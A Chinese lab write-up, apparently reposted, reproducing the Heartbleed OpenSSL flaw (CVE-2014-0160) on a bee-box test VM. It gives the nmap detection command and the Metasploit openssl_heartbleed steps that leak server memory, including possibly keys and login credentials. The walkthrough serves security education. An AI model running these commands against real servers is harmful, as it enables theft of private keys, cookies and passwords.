心脏滴血漏洞复现(CVE-2014-0160)

Posted wjw-zm

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了心脏滴血漏洞复现(CVE-2014-0160)相关的知识,希望对你有一定的参考价值。

漏洞范围:

OpenSSL1.0.1版本

漏洞成因:

Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。

漏洞危害:

如同漏洞成因所讲,我们可以通过该漏洞读取每次攻击泄露出来的信息,所以可能也可以获取到服务器的私钥,用户cookie和密码等。


漏洞复现:

环境:本次环境使用 bee-box虚拟机(已集成该漏洞环境)进行测试。
bee-box虚拟机下载:链接

1.确定目标及端口信息。这里存在漏洞的靶机端口为8443。

 
技术图片

2.使用nmap 的脚本进行检测漏洞是否存在。

nmap -sV -p 8443 --script ssl-heartbleed.nse 192.168.224.131

由下图检测结果可以看出存在心脏滴血漏洞。

 
技术图片

3.github上也有一个项目,是专门检测心脏滴血漏洞的。链接点这里
本地环境试了一下好像不行,大家自行去分析吧,这个不是我讲的重点。

4.使用msf进行漏洞利用。
a) 打开msfconsole后,查找heartbleed模块:

#msf>search heartbleed

[图片上传中...(image.png-be8875-1514368932518-0)]

 
技术图片

b) 使用第一个选项

#msf > use auxiliary/scanner/ssl/openssl_heartbleed
 
技术图片

c) 查看需要设置哪些选项

#msf auxiliary(openssl_heartbleed) > show options
 
技术图片

d) 这里我们需要设置RHOSTS,RPORT

 
技术图片

e) 设置verbose,这个设置要设置成true才能看到泄露的信息

#msf auxiliary(openssl_heartbleed) > set  verbose true
(此设置主要是为了显示整个过程以及leak出来的数据,如果没有的话只显示如下图结果)
 
技术图片

f) exploit

#msf auxiliary(openssl_heartbleed) > exploit
 
技术图片

g) 如果有人在正在登录该web应用的话,还可能可以直接抓到账号密码等信息。

 
技术图片

以上是关于心脏滴血漏洞复现(CVE-2014-0160)的主要内容,如果未能解决你的问题,请参考以下文章

(CVE-2014-0160) OpenSSL 心脏滴血漏洞

OpenSSL 心脏滴血漏洞(CVE-2014-0160)漏洞讲解(小白可懂,简单详细)

揭开CVE漏洞挖掘与编号申请那层神秘窗户纸

揭开CVE漏洞挖掘与编号申请那层神秘窗户纸

python CVE-2014-0160 OpenSSL 1.0.1 - 内存泄漏漏洞

OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例